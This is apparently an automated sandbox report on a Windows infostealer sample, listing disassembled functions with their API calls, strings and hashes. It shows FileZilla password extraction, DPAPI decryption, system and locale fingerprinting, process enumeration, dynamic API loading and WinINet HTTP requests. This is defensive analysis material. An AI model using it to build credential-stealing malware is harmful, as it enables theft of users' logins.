Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 294f136ef59468542dff649e32f3b16774d834884e78db4a947e8595ab33b79e
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: 294f136ef59468542dff649e32f3b16774d834884e78db4a947e8595ab33b79e
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 87ea6fdcd95ad3eef1f5e33aaf7e6504f07c052e8e9aa16fde56be56bccf3904
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: 87ea6fdcd95ad3eef1f5e33aaf7e6504f07c052e8e9aa16fde56be56bccf3904
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02F553C8,00000000,?,0041D758,00000000,?,00000000,00000000,?,02F55A08,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F518D8,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,02F51C20), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,02F55500), ref: 004072FB
lstrcat.KERNEL32(?,02F55548), ref: 0040730F
lstrcat.KERNEL32(?,02F555C0), ref: 00407322
lstrcat.KERNEL32(?,02F55440), ref: 00407336
lstrcat.KERNEL32(?,02F51CA8), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,02F55500), ref: 00407399
lstrcat.KERNEL32(?,02F55548), ref: 004073AD
lstrcat.KERNEL32(?,02F555C0), ref: 004073C1
lstrcat.KERNEL32(?,02F55440), ref: 004073D4
lstrcat.KERNEL32(?,02F51D10), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,02F55500), ref: 00407438
lstrcat.KERNEL32(?,02F55548), ref: 0040744B
lstrcat.KERNEL32(?,02F555C0), ref: 0040745F
lstrcat.KERNEL32(?,02F55440), ref: 00407473
lstrcat.KERNEL32(?,02F56220), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,02F55500), ref: 004074D6
lstrcat.KERNEL32(?,02F55548), ref: 004074EA
lstrcat.KERNEL32(?,02F555C0), ref: 004074FD
lstrcat.KERNEL32(?,02F55440), ref: 00407511
lstrcat.KERNEL32(?,02F56288), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,02F55500), ref: 00407574
lstrcat.KERNEL32(?,02F55548), ref: 00407588
lstrcat.KERNEL32(?,02F555C0), ref: 0040759C
lstrcat.KERNEL32(?,02F55440), ref: 004075AF
lstrcat.KERNEL32(?,02F562F0), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,02F55500), ref: 00407613
lstrcat.KERNEL32(?,02F55548), ref: 00407626
lstrcat.KERNEL32(?,02F555C0), ref: 0040763A
lstrcat.KERNEL32(?,02F55440), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(2F754020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F754020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F754020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F754020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F754020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F754020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F754020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,02F51728), ref: 004077DB
lstrcat.KERNEL32(?,02F558A8), ref: 004077EE
lstrlen.KERNEL32(2F754020), ref: 004077FB
lstrlen.KERNEL32(2F754020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F516B8), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

password: , xrefs: 0040EE3B
browser: FileZilla, xrefs: 0040ED99
<Host>, xrefs: 0040EBBC
<Port>, xrefs: 0040EC06
<User>, xrefs: 0040EC50
url: , xrefs: 0040EDB7
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
login: , xrefs: 0040EE0A
<Pass encoding="base64">, xrefs: 0040EC9A
profile: null, xrefs: 0040EDA8

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: 08918c8b7de6645fdd61b0fd8e8fbcd5f44abe1ff6cbf2e0fe505b3bc06e6e19
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: 08918c8b7de6645fdd61b0fd8e8fbcd5f44abe1ff6cbf2e0fe505b3bc06e6e19
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,02F36CD0), ref: 00415F11
GetProcAddress.KERNEL32(74DD0000,02F36B08), ref: 00415F2A
GetProcAddress.KERNEL32(74DD0000,02F51478), ref: 00415F42
GetProcAddress.KERNEL32(74DD0000,02F51490), ref: 00415F5A
GetProcAddress.KERNEL32(74DD0000,02F51340), ref: 00415F73
GetProcAddress.KERNEL32(74DD0000,02F51948), ref: 00415F8B
GetProcAddress.KERNEL32(74DD0000,02F4FE80), ref: 00415FA3
GetProcAddress.KERNEL32(74DD0000,02F4FF00), ref: 00415FBC
GetProcAddress.KERNEL32(74DD0000,02F514A8), ref: 00415FD4
GetProcAddress.KERNEL32(74DD0000,02F51328), ref: 00415FEC
GetProcAddress.KERNEL32(74DD0000,02F513B8), ref: 00416005
GetProcAddress.KERNEL32(74DD0000,02F513A0), ref: 0041601D
GetProcAddress.KERNEL32(74DD0000,02F50200), ref: 00416035
GetProcAddress.KERNEL32(74DD0000,02F51370), ref: 0041604E
GetProcAddress.KERNEL32(74DD0000,02F51418), ref: 00416066
GetProcAddress.KERNEL32(74DD0000,02F500A0), ref: 0041607E
GetProcAddress.KERNEL32(74DD0000,02F51358), ref: 00416097
GetProcAddress.KERNEL32(74DD0000,02F514C0), ref: 004160AF
GetProcAddress.KERNEL32(74DD0000,02F4FEE0), ref: 004160C7
GetProcAddress.KERNEL32(74DD0000,02F51388), ref: 004160E0
GetProcAddress.KERNEL32(74DD0000,02F4FFA0), ref: 004160F8
LoadLibraryA.KERNEL32(02F512E0,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(02F51598,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(02F51400,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(02F513D0,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(02F514F0,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75A70000,02F514D8), ref: 00416172
GetProcAddress.KERNEL32(75290000,02F513E8), ref: 00416193
GetProcAddress.KERNEL32(75290000,02F51520), ref: 004161AB
GetProcAddress.KERNEL32(75BD0000,02F512F8), ref: 004161CD
GetProcAddress.KERNEL32(75450000,02F4FF20), ref: 004161EE
GetProcAddress.KERNEL32(76E90000,02F519C8), ref: 0041620F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,02F516B8), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,02F51848,?,02F56850,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,02F516E8,00000000,?,02F31DB8,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
RtlAllocateHeap.NTDLL(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
